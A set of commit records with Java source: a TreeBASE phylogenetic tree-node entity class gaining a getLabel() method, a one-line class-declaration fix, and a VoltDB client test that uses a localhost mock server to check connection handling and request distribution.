* @return */ public boolean hasBranchLength() { return getBranchLength() != null; } /** * Return the RightNode field. * * @return long mRightNode */ @Column(name = "RightNode", nullable = true) public long getRightNode() { return mRightNode; } /** * Set the RightNode field. */ public void setRightNode(long pNewRightNode) { mRightNode = pNewRightNode; } /** * Return the LeftNode field. * * @return long mLeftNode */ @Column(name = "LeftNode", nullable = true) public long getLeftNode() { return mLeftNode; } /** * Set the LeftNode field. */ public void setLeftNode(long pNewLeftNode) { mLeftNode = pNewLeftNode; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getName() */ @Column(name = "Name", length = TBPersistable.COLUMN_LENGTH_STRING) public String getName() { return mName; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#setName(java.lang.String) */ public void setName(String pNewName) { mName = pNewName; } /** * Return the Tree field. * * @return PhyloTree */ @ManyToOne(fetch = FetchType.LAZY) @JoinColumn(name = "PHYLOTREE_ID", nullable = false) @Index(name = "TNODE_TREE_IDX") public PhyloTree getTree() { return mTree; } /** * This is for internal use only. Use the public method PhyloTree.addNode() instead. */ protected void setTree(PhyloTree pNewTree) { mTree = pNewTree; } /** * Return the TaxonLabel field. * * @return TaxonLabel */ //Use eager fetch since the taxonlabel is always needed after loading a node. @ManyToOne(cascade = {CascadeType.PERSIST, CascadeType.MERGE}, fetch = FetchType.EAGER) @JoinColumn(name = "TAXONLABEL_ID", nullable = true) @Index(name = "TNODE_TAXLABEL_IDX") public TaxonLabel getTaxonLabel() { return mTaxonLabel; } /** * Set the TaxonLabel field. */ public void setTaxonLabel(TaxonLabel pNewTaxonLabel) { mTaxonLabel = pNewTaxonLabel; } /** * Get the TaxonLabel as a String. Return an empty string if the node has no taxon label. */ @Transient public String getTaxonLabelAsString() { if (getTaxonLabel() != null) { return getTaxonLabel().getTaxonLabel(); } return null; } /** * Get the TaxonLabel as a String. If empty return the node name. */ @Transient public String getTaxonLabelOrName() { String label = getTaxonLabelAsString(); if (TreebaseUtil.isEmpty(label)) { return getName(); } return label; } /** * Return the SibilingNode field. * * @return PhyloTreeNode */ @OneToOne(fetch = FetchType.LAZY) @JoinColumn(name = "SIBLING_ID", nullable = true) protected PhyloTreeNode getSiblingNode() { return mSiblingNode; } /** * Set the SibilingNode field. */ protected void setSiblingNode(PhyloTreeNode pNewSibilingNode) { mSiblingNode = pNewSibilingNode; } /** * Return the ChildNode field. * * @return PhyloTreeNode */ @OneToOne(fetch = FetchType.LAZY) @JoinColumn(name = "CHILD_ID", nullable = true) protected PhyloTreeNode getChildNode() { return mChildNode; } /** * Set the ChildNode field. */ protected void setChildNode(PhyloTreeNode pNewChildNode) { mChildNode = pNewChildNode; } // /** // * Return the InverseSibling field. // * // * @return PhyloTreeNode // */ // @OneToOne(mappedBy = "siblingNode", fetch= FetchType.LAZY) // protected PhyloTreeNode getInverseSibling() { // return mInverseSibling; // } // // /** // * Set the InverseSibling field. // */ // protected void setInverseSibling(PhyloTreeNode pNewInverseSibling) { // mInverseSibling = pNewInverseSibling; // } // // /** // * Return the InverseChild field. // * // * @return PhyloTreeNode // */ // @OneToOne(mappedBy = "childNode", fetch = FetchType.LAZY) // protected PhyloTreeNode getInverseChild() { // return mInverseChild; // } // // /** // * Set the InverseChild field. // */ // protected void setInverseChild(PhyloTreeNode pNewInverseChild) { // mInverseChild = pNewInverseChild; // } // /** * * @see org.cipres.treebase.domain.tree.TreeNode#isRootNode() */ @Transient public boolean isRootNode() { return getParentNode() == null; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#isLeaf() */ @Transient public boolean isLeaf() { return getChildNode() == null; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#getParentNode() */ @ManyToOne(fetch = FetchType.LAZY) @JoinColumn(name = "PARENT_ID", nullable = true) public PhyloTreeNode getParentNode() { return mParentNode; } /** * This is for internal use only. Use the public methods addChildNode() * or PhyloTree.addNode() instead. */ protected void setParentNode(PhyloTreeNode pParentNode) { mParentNode = pParentNode; } /** * * @see org.cipres.treebase.domain.tree.TreeNode#addChildNode(org.cipres.treebase.domain.tree.PhyloTreeNode) */ public void addChildNode(TreeNode pChild) { if (pChild == null || !(pChild instanceof PhyloTreeNode)) { return; } PhyloTreeNode bChild = (PhyloTreeNode) pChild; bChild.setParentNode(this); getTree().addTreeNode(bChild); if (getChildNode() == null) { setChildNode(bChild); } else { getChildNode().addSiblingNode(bChild); } } /** * Add a sibling node. This method does not set the parent node. It is done * by addChildNode(). * * @param pSibling */ private void addSiblingNode(PhyloTreeNode pSibling) { if (pSibling == null) { return; } if (getSiblingNode() == null) { setSiblingNode(pSibling); //Note: this is a private method so we don't need to call the following: //pSibling.setParentNode(this.getParentNode()); } else { getSiblingNode().addSiblingNode(pSibling); } } /** * * @see org.cipres.treebase.domain.tree.TreeNode#RemoveChildNode(org.cipres.treebase.domain.tree.PhyloTreeNode) */ public boolean removeChildNode(TreeNode pChild) { if (pChild == null || getChildNode() == null || !(pChild instanceof PhyloTreeNode)) { return false; } //Note: remove a child node, ADD all the sub node from this child node. // So actually a clad is removed. PhyloTreeNode bChild = (PhyloTreeNode) pChild; boolean removed = false; if (getChildNode() == bChild) { PhyloTreeNode nextChild = bChild.getSiblingNode(); // if (nextChild != null) { // nextChild.setInverseChild(this); // nextChild.setInverseSibling(null); // } setChildNode(nextChild); bChild.setParentNode(null); removed = true; } else { removed = getChildNode().removeSibling(bChild); } return removed; } /** * Remove a sibling node. * * @param pSibling * @return true if the node is found and removed */ private boolean removeSibling(PhyloTreeNode pSibling) { if (pSibling == null || getSiblingNode() == null) { return false; } boolean removed = false; if (getSiblingNode() == pSibling) { PhyloTreeNode nextSibling = pSibling.getSiblingNode(); // if (nextSibling != null) { // nextSibling.setInverseSibling(this); // } setSiblingNode(nextSibling); // pSibling.setInverseChild(null); // pSibling.setInverseSibling(null); pSibling.setSiblingNode(null); pSibling.setParentNode(null); removed = true; } else { removed = getSiblingNode().removeSibling(pSibling); } return removed; } /** * Return the NodeAttribute field. * * @return NodeAttribute */ @ManyToOne(cascade = CascadeType.ALL, fetch = FetchType.LAZY) @JoinColumn(name = "NODEATTRIBUTE_ID", nullable = true) public NodeAttribute getNodeAttribute() { return mNodeAttribute; } /** * Set the NodeAttribute field. */ public void setNodeAttribute(NodeAttribute pNewNodeAttribute) { mNodeAttribute = pNewNodeAttribute; } /** * Return all the children for this node. * * @return */ @Transient public List<PhyloTreeNode> getChildNodes() { List<PhyloTreeNode> nodes = new ArrayList<PhyloTreeNode>(); PhyloTreeNode child = getChildNode(); if (child != null) { nodes.add(child); PhyloTreeNode sibling = child.getSiblingNode(); while (sibling != null) { nodes.add(sibling); sibling = sibling.getSiblingNode(); } } return nodes; } /* * TODO: In an annotated tree, there is a more efficient way to do this. * Simply select every node N such that all of: * 0. N.tree == this.tree * 1. N.leftNode < this.leftNode * 2. N.rightNode > this.rightNode * * To get them in order, simply sort by leftNode value; the least leftNode is the root, and the * greatest is the parent. To include this node itself, change < and > to <= and >=. */ /** * @return the list of nodes that are ancestors of this one, in order with the root last */ @Transient List<PhyloTreeNode> getAncestorNodes() { List<PhyloTreeNode> nodes = new ArrayList<PhyloTreeNode>(); PhyloTreeNode cur; for (cur = (PhyloTreeNode) this.getParentNode(); cur != null; cur = (PhyloTreeNode) cur.getParentNode()) { nodes.add(cur); } return nodes; } /** * Annotate the leftNode and rightNode members of this node and * all its child nodes in the tree. Afterwards, every node in the subtree rooted here * will have the following properties: * a.leftNode < b.leftNode < b.rightNode < a.rightNode whenever b is a child of a * (a.rightNode - a.leftNode + 1)/2 is the size of the tree rooted at a * * @param start The leftNode value that should be assigned to this node * @return The rightNode value that was assigned to this node * @author mjd */ public long updateSubtreeBounds(long start) { this.setLeftNode(start); for (PhyloTreeNode c : this.getChildNodes()) { start = c.updateSubtreeBounds(start+1); } this.setRightNode(start+1); return start+1; } /** * @return True if and only if the leftNode and rightNode elements have been set * @author mjd */ @Transient public boolean hasSubtreeBounds() { return this.getLeftNode() != 0 && this.getRightNode() != 0; } /** * * @param that some other node in the same tree * @return whether this node is an ancestor of that node * @author mjd */ public boolean isAncestorOf(PhyloTreeNode that) { return this.getLeftNode() < that.getLeftNode() && that.getRightNode() < this.getRightNode(); } /** * * @param that some other node in the same tree * @return whether this node is a descdendant of that node * @author mjd */ public boolean isDescendantOf(PhyloTreeNode that) { return that.isAncestorOf(this); } /** * * TODO: in an annotated tree, there is a much better way to do this. * we can do a single Hibernate query that selects the first node N such that all of: * 0. N.tree == this.tree * 1. N.leftNode < this.leftNode * 2. N.leftNode < that.leftNode * 3. N.rightNode > this.rightNode * 4. N.rightNode > that.rightNode * 6. order descending by this.leftNode */ /** * @param that some other node in the same tree * @return the lowest node in the chain of common ancestors of this node and that */ public PhyloTreeNode nearestCommonAncestor(PhyloTreeNode that) { for (PhyloTreeNode p : this.getAncestorNodes()) { if (p.isAncestorOf(that)) { return p; } } return null; // This should never happen } /* TODO: as with the methods above, there is an abbreviation for this when the tree is annotated */ /** * * @param n1 another node in the same tree * @param n2 another node in the same tree * @return whether n1 and n2 are more closely related to each other than either is to this node */ public boolean haveABCTopology(PhyloTreeNode n1, PhyloTreeNode n2) { return ! n1.nearestCommonAncestor(n2).isAncestorOf(this); } }
Added getLabel() for nexml and rdf serialization.
treebase-core/src/main/java/org/cipres/treebase/domain/tree/PhyloTreeNode.java
Added getLabel() for nexml and rdf serialization.
<ide><path>reebase-core/src/main/java/org/cipres/treebase/domain/tree/PhyloTreeNode.java <ide> public boolean haveABCTopology(PhyloTreeNode n1, PhyloTreeNode n2) { <ide> return ! n1.nearestCommonAncestor(n2).isAncestorOf(this); <ide> } <add> <add> @Override <add> @Transient <add> public String getLabel() { <add> return getTaxonLabelAsString(); <add> } <ide> }
Java
mpl-2.0
52bb7d7f351e26d6db092b0d5b0230e4227da96d
0
HKervadec/PrjCompil,HKervadec/PrjCompil
public class idConst extends Ident{ }
idConst.java
public class idConst( )
Update idConst.java accolade
idConst.java
Update idConst.java
<ide><path>dConst.java <del> <del>public class idConst( <del>) <add>public class idConst extends Ident{ <add>}
Java
agpl-3.0
0614a7ca4c7f60475f6bc0acb3a1885a0ac85a64
0
flybird119/voltdb,ingted/voltdb,simonzhangsm/voltdb,wolffcm/voltdb,flybird119/voltdb,deerwalk/voltdb,zuowang/voltdb,paulmartel/voltdb,creative-quant/voltdb,wolffcm/voltdb,deerwalk/voltdb,VoltDB/voltdb,migue/voltdb,creative-quant/voltdb,kobronson/cs-voltdb,migue/voltdb,ingted/voltdb,paulmartel/voltdb,creative-quant/voltdb,kumarrus/voltdb,migue/voltdb,paulmartel/voltdb,creative-quant/voltdb,simonzhangsm/voltdb,kobronson/cs-voltdb,kobronson/cs-voltdb,ingted/voltdb,paulmartel/voltdb,kumarrus/voltdb,zuowang/voltdb,wolffcm/voltdb,kumarrus/voltdb,simonzhangsm/voltdb,paulmartel/voltdb,migue/voltdb,paulmartel/voltdb,deerwalk/voltdb,ingted/voltdb,deerwalk/voltdb,kumarrus/voltdb,wolffcm/voltdb,kumarrus/voltdb,kumarrus/voltdb,zuowang/voltdb,flybird119/voltdb,kobronson/cs-voltdb,wolffcm/voltdb,VoltDB/voltdb,paulmartel/voltdb,VoltDB/voltdb,simonzhangsm/voltdb,wolffcm/voltdb,kumarrus/voltdb,VoltDB/voltdb,flybird119/voltdb,kobronson/cs-voltdb,kobronson/cs-voltdb,zuowang/voltdb,flybird119/voltdb,VoltDB/voltdb,creative-quant/voltdb,flybird119/voltdb,deerwalk/voltdb,migue/voltdb,wolffcm/voltdb,deerwalk/voltdb,zuowang/voltdb,simonzhangsm/voltdb,ingted/voltdb,ingted/voltdb,ingted/voltdb,deerwalk/voltdb,simonzhangsm/voltdb,kobronson/cs-voltdb,VoltDB/voltdb,deerwalk/voltdb,kumarrus/voltdb,zuowang/voltdb,simonzhangsm/voltdb,migue/voltdb,ingted/voltdb,simonzhangsm/voltdb,paulmartel/voltdb,wolffcm/voltdb,zuowang/voltdb,creative-quant/voltdb,kobronson/cs-voltdb,flybird119/voltdb,flybird119/voltdb,creative-quant/voltdb,migue/voltdb,zuowang/voltdb,creative-quant/voltdb,migue/voltdb,VoltDB/voltdb
/* This file is part of VoltDB. * Copyright (C) 2008-2010 VoltDB Inc. * * Permission is hereby granted, free of charge, to any person obtaining * a copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sublicense, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. * IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. */ package org.voltdb.client; import java.io.IOException; import java.net.InetSocketAddress; import java.nio.ByteBuffer; import java.nio.channels.ServerSocketChannel; import java.nio.channels.SocketChannel; import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicInteger; import junit.framework.TestCase; import org.junit.Test; import org.voltdb.ClientResponseImpl; import org.voltdb.StoredProcedureInvocation; import org.voltdb.VoltTable; import org.voltdb.VoltType; import org.voltdb.messaging.FastDeserializer; import org.voltdb.network.Connection; import org.voltdb.network.QueueMonitor; import org.voltdb.network.VoltNetwork; import org.voltdb.network.VoltProtocolHandler; public class TestDistributer extends TestCase { class MockInputHandler extends VoltProtocolHandler { @Override public int getMaxRead() { return 8192; } @Override public void handleMessage(ByteBuffer message, Connection c) { try { FastDeserializer fds = new FastDeserializer(message); StoredProcedureInvocation spi = fds.readObject(StoredProcedureInvocation.class); VoltTable vt[] = new VoltTable[1]; vt[0] = new VoltTable(new VoltTable.ColumnInfo("Foo", VoltType.BIGINT)); vt[0].addRow(1); ClientResponseImpl response = new ClientResponseImpl(ClientResponseImpl.SUCCESS, vt, "Extra String", spi.getClientHandle()); c.writeStream().enqueue(response); roundTrips.incrementAndGet(); System.err.println("Sending response."); } catch (Exception ex) { ex.printStackTrace(); } } @Override public int getExpectedOutgoingMessageSize() { return 2048; } @Override public void started(Connection c) { // TODO Auto-generated method stub } @Override public void starting(Connection c) { // TODO Auto-generated method stub } @Override public void stopped(Connection c) { // TODO Auto-generated method stub } @Override public void stopping(Connection c) { // TODO Auto-generated method stub } AtomicInteger roundTrips = new AtomicInteger(); @Override public Runnable offBackPressure() { return new Runnable() { @Override public void run() {} }; } @Override public Runnable onBackPressure() { return new Runnable() { @Override public void run() {} }; } @Override public QueueMonitor writestreamMonitor() { return null; } } // A fake server. class MockVolt extends Thread { boolean handleConnection = true; MockVolt(int port) throws IOException { network = new VoltNetwork(); network.start(); socket = ServerSocketChannel.open(); socket.configureBlocking(false); socket.socket().bind(new InetSocketAddress(port)); } @Override public void run() { try { while (shutdown.get() == false) { SocketChannel client = socket.accept(); if (client != null) { client.configureBlocking(true); final ByteBuffer lengthBuffer = ByteBuffer.allocate(5);//Extra byte for version also client.read(lengthBuffer); final ByteBuffer serviceLengthBuffer = ByteBuffer.allocate(4); while (serviceLengthBuffer.remaining() > 0) client.read(serviceLengthBuffer); serviceLengthBuffer.flip(); ByteBuffer serviceBuffer = ByteBuffer.allocate(serviceLengthBuffer.getInt()); while (serviceBuffer.remaining() > 0) client.read(serviceBuffer); serviceBuffer.flip(); final ByteBuffer usernameLengthBuffer = ByteBuffer.allocate(4); while (usernameLengthBuffer.remaining() > 0) client.read(usernameLengthBuffer); usernameLengthBuffer.flip(); final int usernameLength = usernameLengthBuffer.getInt(); final ByteBuffer usernameBuffer = ByteBuffer.allocate(usernameLength); while (usernameBuffer.remaining() > 0) client.read(usernameBuffer); usernameBuffer.flip(); final ByteBuffer passwordBuffer = ByteBuffer.allocate(20); while (passwordBuffer.remaining() > 0) client.read(passwordBuffer); passwordBuffer.flip(); final byte usernameBytes[] = new byte[usernameLength]; final byte passwordBytes[] = new byte[20]; usernameBuffer.get(usernameBytes); passwordBuffer.get(passwordBytes); @SuppressWarnings("unused") final String username = new String(usernameBytes); final ByteBuffer responseBuffer = ByteBuffer.allocate(34); responseBuffer.putInt(30); responseBuffer.put((byte)0);//version responseBuffer.put((byte)0);//success response responseBuffer.putInt(0);//hostId responseBuffer.putLong(0);//connectionId responseBuffer.putLong(0);//instanceId responseBuffer.putInt(0);//instanceId pt 2 responseBuffer.putInt(0); responseBuffer.flip(); handler = new MockInputHandler(); client.write(responseBuffer); client.configureBlocking(false); if (handleConnection) { network.registerChannel( client, handler); } } } } catch (IOException e) { e.printStackTrace(); } try { network.shutdown(); } catch (InterruptedException e) { // TODO Auto-generated catch block e.printStackTrace(); } try { socket.close(); } catch (IOException ignored) { } } public void shutdown() { shutdown.set(true); } AtomicBoolean shutdown = new AtomicBoolean(false); volatile ServerSocketChannel socket = null; volatile MockInputHandler handler = null; volatile VoltNetwork network; } private static class CSL implements ClientStatusListener { private volatile boolean m_exceptionHandled = false; @Override public void uncaughtException(ProcedureCallback callback, ClientResponse r, Throwable e) { m_exceptionHandled = true; } @Override public void backpressure(boolean status) { // TODO Auto-generated method stub } @Override public void connectionLost(String hostname, int connectionsLeft) { // TODO Auto-generated method stub } } public class ProcCallback implements ProcedureCallback { @Override public void clientCallback(ClientResponse clientResponse) { System.err.println("Ran callback."); } } public class ThrowingCallback implements ProcedureCallback { @Override public void clientCallback(ClientResponse clientResponse) { throw new RuntimeException(); } } @Test public void testCreateConnection() throws Exception { MockVolt volt0 = null; MockVolt volt1 = null; try { // create a fake server and connect to it. volt0 = new MockVolt(20000); volt0.start(); volt1 = new MockVolt(20001); volt1.start(); assertTrue(volt1.socket.isOpen()); assertTrue(volt0.socket.isOpen()); // And a distributer Distributer dist = new Distributer(); dist.createConnection("localhost", "", "", 20000); dist.createConnection("localhost", "", "", 20001); Thread.sleep(1000); assertTrue(volt1.handler != null); assertTrue(volt0.handler != null); } finally { if (volt0 != null) { volt0.shutdown(); volt0.join(); } if (volt1 != null) { volt1.shutdown(); volt1.join(); } } } @Test public void testQueue() throws Exception { // Uncongested connections get round-robin use. MockVolt volt0, volt1, volt2; int handle = 0; volt0 = volt1 = volt2 = null; try { volt0 = new MockVolt(20000); volt0.start(); volt1 = new MockVolt(20001); volt1.start(); volt2 = new MockVolt(20002); volt2.start(); CSL csl = new CSL(); Distributer dist = new Distributer(128, null, false, null); dist.addClientStatusListener(csl); dist.createConnection("localhost", "", "", 20000); dist.createConnection("localhost", "", "", 20001); dist.createConnection("localhost", "", "", 20002); assertTrue(volt1.handler != null); assertTrue(volt0.handler != null); assertTrue(volt2.handler != null); ProcedureInvocation pi1 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi2 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi3 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi4 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi5 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi6 = new ProcedureInvocation(++handle, "i1", new Integer(1)); dist.queue(pi1, new ThrowingCallback(), 128, true); dist.drain(); assertTrue(csl.m_exceptionHandled); dist.queue(pi2, new ProcCallback(), 128, true); dist.queue(pi3, new ProcCallback(), 128, true); dist.queue(pi4, new ProcCallback(), 128, true); dist.queue(pi5, new ProcCallback(), 128, true); dist.queue(pi6, new ProcCallback(), 128, true); dist.drain(); System.err.println("Finished drain."); assertEquals(2, volt0.handler.roundTrips.get()); assertEquals(2, volt1.handler.roundTrips.get()); assertEquals(2, volt2.handler.roundTrips.get()); } finally { if (volt0 != null) { volt0.shutdown(); volt0.join(); } if (volt1 != null) { volt1.shutdown(); volt1.join(); } if (volt2 != null) { volt2.shutdown(); volt2.join(); } } } public void testClient() throws Exception { MockVolt volt = null; try { // create a fake server and connect to it. volt = new MockVolt(21212); volt.start(); Client clt = ClientFactory.createClient(); clt.createConnection("localhost"); // this call blocks for a result! clt.callProcedure("Foo", new Integer(1)); assertEquals(1, volt.handler.roundTrips.get()); // this call doesn't block! (use drain) clt.callProcedure(new ProcCallback(), "Bar", new Integer(2)); clt.drain(); assertEquals(2, volt.handler.roundTrips.get()); } finally { if (volt != null) { volt.shutdown(); volt.join(); } } } @Test public void testClientBlockedOnMaxOutstanding() throws Exception { // create a fake server and connect to it. MockVolt volt0 = new MockVolt(20000); volt0.handleConnection = false; try { volt0.start(); ClientConfig config = new ClientConfig(); config.setMaxOutstandingTxns(5); final Client client = ClientFactory.createClient(config); client.createConnection("localhost", 20000); final java.util.concurrent.atomic.AtomicInteger counter = new java.util.concurrent.atomic.AtomicInteger(0); final Thread loadThread = new Thread() { @Override public void run() { try { for (int ii = 0; ii < 6; ii++) { client.callProcedure(new NullCallback(), "foo"); counter.incrementAndGet(); } } catch (Exception e) { e.printStackTrace(); } } }; loadThread.start(); final long start = System.currentTimeMillis(); loadThread.join(300); final long finish = System.currentTimeMillis(); assert(finish - start >= 300); assert(counter.get() == 5); loadThread.stop(); } finally { volt0.shutdown(); } } public void testUnresolvedHost() throws IOException { final String hostname = "doesnotexist"; boolean threwException = false; try { ConnectionUtil.getAuthenticatedConnection(hostname, "", new byte[0], 32); } catch (java.net.UnknownHostException e) { threwException = true; assertTrue(e.getMessage().equals(hostname)); } assertTrue(threwException); } }
tests/frontend/org/voltdb/client/TestDistributer.java
/* This file is part of VoltDB. * Copyright (C) 2008-2010 VoltDB Inc. * * Permission is hereby granted, free of charge, to any person obtaining * a copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sublicense, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. * IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. */ package org.voltdb.client; import java.io.IOException; import java.net.InetSocketAddress; import java.net.UnknownHostException; import java.nio.ByteBuffer; import java.nio.channels.ServerSocketChannel; import java.nio.channels.SocketChannel; import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicInteger; import junit.framework.TestCase; import org.junit.Test; import org.voltdb.ClientResponseImpl; import org.voltdb.StoredProcedureInvocation; import org.voltdb.VoltTable; import org.voltdb.VoltType; import org.voltdb.messaging.FastDeserializer; import org.voltdb.network.Connection; import org.voltdb.network.QueueMonitor; import org.voltdb.network.VoltNetwork; import org.voltdb.network.VoltProtocolHandler; public class TestDistributer extends TestCase { class MockInputHandler extends VoltProtocolHandler { @Override public int getMaxRead() { return 8192; } @Override public void handleMessage(ByteBuffer message, Connection c) { try { FastDeserializer fds = new FastDeserializer(message); StoredProcedureInvocation spi = fds.readObject(StoredProcedureInvocation.class); VoltTable vt[] = new VoltTable[1]; vt[0] = new VoltTable(new VoltTable.ColumnInfo("Foo", VoltType.BIGINT)); vt[0].addRow(1); ClientResponseImpl response = new ClientResponseImpl(ClientResponseImpl.SUCCESS, vt, "Extra String", spi.getClientHandle()); c.writeStream().enqueue(response); roundTrips.incrementAndGet(); System.err.println("Sending response."); } catch (Exception ex) { ex.printStackTrace(); } } @Override public int getExpectedOutgoingMessageSize() { return 2048; } @Override public void started(Connection c) { // TODO Auto-generated method stub } @Override public void starting(Connection c) { // TODO Auto-generated method stub } @Override public void stopped(Connection c) { // TODO Auto-generated method stub } @Override public void stopping(Connection c) { // TODO Auto-generated method stub } AtomicInteger roundTrips = new AtomicInteger(); @Override public Runnable offBackPressure() { return new Runnable() { @Override public void run() {} }; } @Override public Runnable onBackPressure() { return new Runnable() { @Override public void run() {} }; } @Override public QueueMonitor writestreamMonitor() { return null; } } // A fake server. class MockVolt extends Thread { boolean handleConnection = true; MockVolt(int port) { try { network = new VoltNetwork(); network.start(); socket = ServerSocketChannel.open(); socket.configureBlocking(false); socket.socket().bind(new InetSocketAddress(port)); } catch (IOException e) { e.printStackTrace(); } } @Override public void run() { try { while (shutdown.get() == false) { SocketChannel client = socket.accept(); if (client != null) { client.configureBlocking(true); final ByteBuffer lengthBuffer = ByteBuffer.allocate(5);//Extra byte for version also client.read(lengthBuffer); final ByteBuffer serviceLengthBuffer = ByteBuffer.allocate(4); while (serviceLengthBuffer.remaining() > 0) client.read(serviceLengthBuffer); serviceLengthBuffer.flip(); ByteBuffer serviceBuffer = ByteBuffer.allocate(serviceLengthBuffer.getInt()); while (serviceBuffer.remaining() > 0) client.read(serviceBuffer); serviceBuffer.flip(); final ByteBuffer usernameLengthBuffer = ByteBuffer.allocate(4); while (usernameLengthBuffer.remaining() > 0) client.read(usernameLengthBuffer); usernameLengthBuffer.flip(); final int usernameLength = usernameLengthBuffer.getInt(); final ByteBuffer usernameBuffer = ByteBuffer.allocate(usernameLength); while (usernameBuffer.remaining() > 0) client.read(usernameBuffer); usernameBuffer.flip(); final ByteBuffer passwordBuffer = ByteBuffer.allocate(20); while (passwordBuffer.remaining() > 0) client.read(passwordBuffer); passwordBuffer.flip(); final byte usernameBytes[] = new byte[usernameLength]; final byte passwordBytes[] = new byte[20]; usernameBuffer.get(usernameBytes); passwordBuffer.get(passwordBytes); @SuppressWarnings("unused") final String username = new String(usernameBytes); final ByteBuffer responseBuffer = ByteBuffer.allocate(34); responseBuffer.putInt(30); responseBuffer.put((byte)0);//version responseBuffer.put((byte)0);//success response responseBuffer.putInt(0);//hostId responseBuffer.putLong(0);//connectionId responseBuffer.putLong(0);//instanceId responseBuffer.putInt(0);//instanceId pt 2 responseBuffer.putInt(0); responseBuffer.flip(); handler = new MockInputHandler(); client.write(responseBuffer); client.configureBlocking(false); if (handleConnection) { network.registerChannel( client, handler); } } } } catch (IOException e) { e.printStackTrace(); } try { network.shutdown(); } catch (InterruptedException e) { // TODO Auto-generated catch block e.printStackTrace(); } try { socket.close(); } catch (IOException ignored) { } } public void shutdown() { shutdown.set(true); } AtomicBoolean shutdown = new AtomicBoolean(false); volatile ServerSocketChannel socket = null; volatile MockInputHandler handler = null; volatile VoltNetwork network; } private static class CSL implements ClientStatusListener { private volatile boolean m_exceptionHandled = false; @Override public void uncaughtException(ProcedureCallback callback, ClientResponse r, Throwable e) { m_exceptionHandled = true; } @Override public void backpressure(boolean status) { // TODO Auto-generated method stub } @Override public void connectionLost(String hostname, int connectionsLeft) { // TODO Auto-generated method stub } } public class ProcCallback implements ProcedureCallback { @Override public void clientCallback(ClientResponse clientResponse) { System.err.println("Ran callback."); } } public class ThrowingCallback implements ProcedureCallback { @Override public void clientCallback(ClientResponse clientResponse) { throw new RuntimeException(); } } @Test public void testCreateConnection() throws InterruptedException { MockVolt volt0 = null; MockVolt volt1 = null; // create a fake server and connect to it. volt0 = new MockVolt(20000); volt0.start(); volt1 = new MockVolt(20001); volt1.start(); assertTrue(volt1.socket.isOpen()); assertTrue(volt0.socket.isOpen()); // And a distributer Distributer dist = new Distributer(); try { dist.createConnection("localhost", "", "", 20000); dist.createConnection("localhost", "", "", 20001); } catch (UnknownHostException e) { e.printStackTrace(); fail(); } catch (IOException e) { e.printStackTrace(); fail(); } Thread.sleep(1000); assertTrue(volt1.handler != null); assertTrue(volt0.handler != null); if (volt0 != null) { volt0.shutdown(); volt0.join(); } if (volt1 != null) { volt1.shutdown(); volt1.join(); } } @Test public void testQueue() throws Exception { // Uncongested connections get round-robin use. MockVolt volt0, volt1, volt2; int handle = 0; volt0 = volt1 = volt2 = null; try { volt0 = new MockVolt(20000); volt0.start(); volt1 = new MockVolt(20001); volt1.start(); volt2 = new MockVolt(20002); volt2.start(); CSL csl = new CSL(); Distributer dist = new Distributer(128, null, false, null); dist.addClientStatusListener(csl); dist.createConnection("localhost", "", "", 20000); dist.createConnection("localhost", "", "", 20001); dist.createConnection("localhost", "", "", 20002); assertTrue(volt1.handler != null); assertTrue(volt0.handler != null); assertTrue(volt2.handler != null); ProcedureInvocation pi1 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi2 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi3 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi4 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi5 = new ProcedureInvocation(++handle, "i1", new Integer(1)); ProcedureInvocation pi6 = new ProcedureInvocation(++handle, "i1", new Integer(1)); dist.queue(pi1, new ThrowingCallback(), 128, true); dist.drain(); assertTrue(csl.m_exceptionHandled); dist.queue(pi2, new ProcCallback(), 128, true); dist.queue(pi3, new ProcCallback(), 128, true); dist.queue(pi4, new ProcCallback(), 128, true); dist.queue(pi5, new ProcCallback(), 128, true); dist.queue(pi6, new ProcCallback(), 128, true); dist.drain(); System.err.println("Finished drain."); assertEquals(2, volt0.handler.roundTrips.get()); assertEquals(2, 